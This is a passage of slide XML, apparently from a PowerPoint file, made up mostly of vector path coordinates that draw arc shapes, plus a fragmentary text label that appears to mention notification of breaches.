                <a:lnTo>
                  <a:pt x="840638" y="2959646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797839" y="2934716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="2908262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="2948013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757948" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842911" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886269" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930160" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974572" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019441" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064742" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110449" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156500" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1202880" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1249553" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296479" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343621" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390942" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438402" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485976" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533613" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="3210814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628978" y="3210090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676615" y="3207905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724190" y="3204260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771650" y="3199168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818970" y="3192615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866112" y="3184601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913039" y="3175139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959711" y="3164230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2006092" y="3151848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052142" y="3138017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097849" y="3122726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143150" y="3105988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2188019" y="3087789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232431" y="3068129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276322" y="3047022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319680" y="3024454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362466" y="3000438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2404643" y="2974949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="2948013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="2446172" y="263740"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2404643" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2362466" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319680" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2276322" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232431" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2188019" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143150" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2097849" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052142" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2006092" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1959711" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1913039" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866112" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1818970" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771650" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724190" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1676615" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1628978" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533613" y="736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485976" y="2921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1438402" y="6578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390942" y="11684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343621" y="18262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296479" y="26301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1249553" y="35801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1202880" y="46761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156500" y="59182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110449" y="73063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064742" y="88404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1019441" y="105206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974572" y="123469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="930160" y="143192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="886269" y="164388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="842911" y="187032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800125" y="211150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757948" y="236715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716432" y="263740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755675" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797839" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="840638" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="884034" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927989" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972477" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1017435" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062850" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108671" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154874" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201407" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1248244" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1295336" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342656" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1390154" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437805" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1485582" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533423" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1581302" y="58013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629168" y="58762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1677009" y="61036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1724787" y="64833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772437" y="70142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819935" y="76974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1867255" y="85318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1914347" y="95173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1961184" y="106553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2007717" y="119443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2053920" y="133858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099741" y="149783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2145157" y="167233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2190115" y="186194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2234603" y="206667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2278557" y="228663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321953" y="252171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2364752" y="277202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406929" y="303745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2446172" y="263740"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1888705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858820" y="1936508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846019" y="1983613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831617" y="2030006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815615" y="2075637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798076" y="2120493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779014" y="2164537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758452" y="2207717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736456" y="2250033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713024" y="2291423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688209" y="2331859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662034" y="2371331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634538" y="2409774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2605748" y="2447175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575699" y="2483497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544419" y="2518714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511958" y="2552776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478316" y="2585669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2443556" y="2617343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407691" y="2647785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370772" y="2676944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332812" y="2704795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293848" y="2731300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253919" y="2756433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213064" y="2780157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2171293" y="2802445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128659" y="2823260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085187" y="2842577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040902" y="2860344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995855" y="2876537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1950059" y="2891129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903552" y="2904096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2915374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="2963126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904619" y="2952153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952180" y="2939504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999030" y="2925203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045131" y="2909290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090458" y="2891790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134984" y="2872740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178672" y="2852166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2221484" y="2830106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263394" y="2806598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304377" y="2781655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344394" y="2755328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2383421" y="2727642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2421407" y="2698635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458351" y="2668320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494191" y="2636748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528913" y="2603944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562479" y="2569934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594864" y="2534755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626042" y="2498445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655963" y="2461031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684602" y="2422550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711932" y="2383028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737929" y="2342489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762542" y="2300973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785757" y="2258517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807525" y="2215159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827832" y="2170912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846641" y="2125815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863913" y="2079891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879636" y="2033193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893745" y="1985746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2906242" y="1937575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1888705"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2906242" y="1275829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2893745" y="1227531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2879636" y="1179944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863913" y="1133106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846641" y="1087069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2827832" y="1041844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2807525" y="997470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2785757" y="953985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2762542" y="911415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2737929" y="869784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2711932" y="829132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684602" y="789495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655963" y="750912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626042" y="713384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2594864" y="676973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2562479" y="641705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2528913" y="607606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494191" y="574700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2458351" y="543039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2421407" y="512648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2383421" y="483552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344394" y="455790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304377" y="429387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263394" y="404380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2221484" y="380796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178672" y="358673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2134984" y="338048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2090458" y="318935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045131" y="301383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1999030" y="285419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1952180" y="271068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904619" y="258381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="247357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1856384" y="295236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1903552" y="306565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1950059" y="319570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1995855" y="334213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2040902" y="350456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085187" y="368287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128659" y="387654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2171293" y="408533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213064" y="430885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2253919" y="454672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293848" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2332812" y="506476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2370772" y="534403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2407691" y="563651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2443556" y="594169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2478316" y="625944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2511958" y="658926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2544419" y="693089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2575699" y="728395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2605748" y="764819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2634538" y="802335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2662034" y="840892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2688209" y="880465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713024" y="921016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2736456" y="962520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2758452" y="1004951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2779014" y="1048258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2798076" y="1092415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2815615" y="1137386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2831617" y="1183157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2846019" y="1229677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2858820" y="1276908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2869971" y="1324825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2917088" y="1324825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3159760" h="3211195">
                <a:moveTo>
                  <a:pt x="3159544" y="1582407"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1535226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1488097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1441056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="767295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="808977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="851255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="894118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="937514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="981417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="1025791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="1070597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="1115822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="1161402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="1207312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1253515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1299984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1346682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1393571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1440611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1487779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1535036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1582343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3102457" y="1629676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3101035" y="1676984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098215" y="1724240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3093974" y="1771408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3088309" y="1818449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3081248" y="1865337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072765" y="1912035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3062871" y="1958505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3051556" y="2004707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038830" y="2050618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3024695" y="2096198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3009138" y="2141423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2992170" y="2186228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973794" y="2230602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954007" y="2274506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932798" y="2317902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2910179" y="2360765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2886138" y="2403043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860700" y="2444712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900070" y="2484590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926016" y="2443505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2950591" y="2401786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2973806" y="2359482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995663" y="2316607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3016148" y="2273223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035262" y="2229332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3053016" y="2184997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3069412" y="2140229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084436" y="2095080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3098088" y="2049576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110382" y="2003742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3121304" y="1957628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130867" y="1911261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3139059" y="1864677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3145891" y="1817890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3151352" y="1770964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155442" y="1723923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3158185" y="1676793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1629613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3159544" y="1582407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815710" y="5466715"/>
            <a:ext cx="1553210" cy="694055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 marR="5080" indent="8890">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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No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if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cati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n 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bre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ches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58943" y="4204245"/>
            <a:ext cx="3159760" cy="3211195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3159759" h="3211195">
                <a:moveTo>
                  <a:pt x="298856" y="767295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="259486" y="727417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233527" y="768515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208953" y="810234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185737" y="852538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163880" y="895413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143395" y="938796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124282" y="982687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106527" y="1027023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90131" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75107" y="1116939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61455" y="1162443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49161" y="1208278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38239" y="1254391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28676" y="1300759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20485" y="1347343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="1394129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8191" y="1441056"/>
